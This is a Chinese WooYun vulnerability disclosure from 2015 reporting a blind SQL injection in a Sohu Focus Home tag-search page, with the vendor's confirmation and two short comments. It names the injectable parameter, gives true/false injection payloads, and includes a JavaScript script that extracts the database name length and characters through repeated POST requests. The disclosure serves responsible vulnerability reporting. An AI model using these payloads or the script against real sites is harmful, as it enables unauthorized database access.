当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-092808

漏洞标题:搜狐焦点家居另一处SQL盲注附POC脚本

相关厂商:搜狐

漏洞作者: Yns0ng

提交时间:2015-01-20 02:02

修复时间:2015-03-06 02:04

公开时间:2015-03-06 02:04

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-20: 细节已通知厂商并且等待厂商处理中
2015-01-20: 厂商已经确认,细节仅向厂商公开
2015-01-30: 细节向核心白帽子及相关领域专家公开
2015-02-09: 细节向普通白帽子公开
2015-02-19: 细节向实习白帽子公开
2015-03-06: 细节向公众公开

简要描述:

焦点家居某处Boolean盲注,附JS脚本,仅作验证漏洞用。

详细说明:

1,注入点
http://home.focus.cn/group/others/tag/group_tag_list.php
POST: q_tag_name=360&x=19&y=9 参数q_tag_name为注入点
2,PoC
为True时:q_tag_name=360" and "a"="a&x=19&y=9

true.jpg


为False时:q_tag_name=360" and "a"="b&x=19&y=9

false.jpg


3,验证脚本

var xhr = new XMLHttpRequest();
var url = 'http://home.focus.cn/group/others/tag/group_tag_list.php';
var dbLen = 0;
for (var i=2; i<21; i++) {
    var data = 'q_tag_name=360" and length(database())=' + i + ' and "a"="a&x=19&y=9';
    xhr.open('POST', url, false);
    xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
    xhr.send(data);
    if (xhr.responseText.indexOf('360') > -1) {
        dbLen = i;
        break;
    }
}
console.log('The length of DB is: ' + dbLen);


var charBox = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',0,1,2,3,4,5,6,7,8,9,'@','-','_','.'];
var xhr = new XMLHttpRequest();
var url = 'http://home.focus.cn/group/others/tag/group_tag_list.php';
var db = '';
for (var i=1; i<6; i++) {
    for (var j in charBox) {
        var data = 'q_tag_name=360" and ascii(mid(database(),'+i+',1))=' + charBox[j].charCodeAt(0) + ' and "a"="a&x=19&y=9';
        xhr.open('POST', url, false);
        xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
        xhr.send(data);
        if (xhr.responseText.indexOf('360') > -1) {
            console.log(data+"\n");
            db += charBox[j];
            break;
        }
    }
}
console.log('The DB name is: ' + db);

漏洞证明:

boolean2.jpg

修复方案:

版权声明:转载请注明来源 Yns0ng@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-01-20 09:31

厂商回复:

感谢你对搜狐安全的支持。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-01-20 11:55 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    js 脚本啊?

  2. 2015-01-21 10:14 | Yns0ng ( 普通白帽子 | Rank:104 漏洞数:12 | 闭关修炼中)

    @疯子 嗯 十几行代码的小脚本 证明漏洞存在即可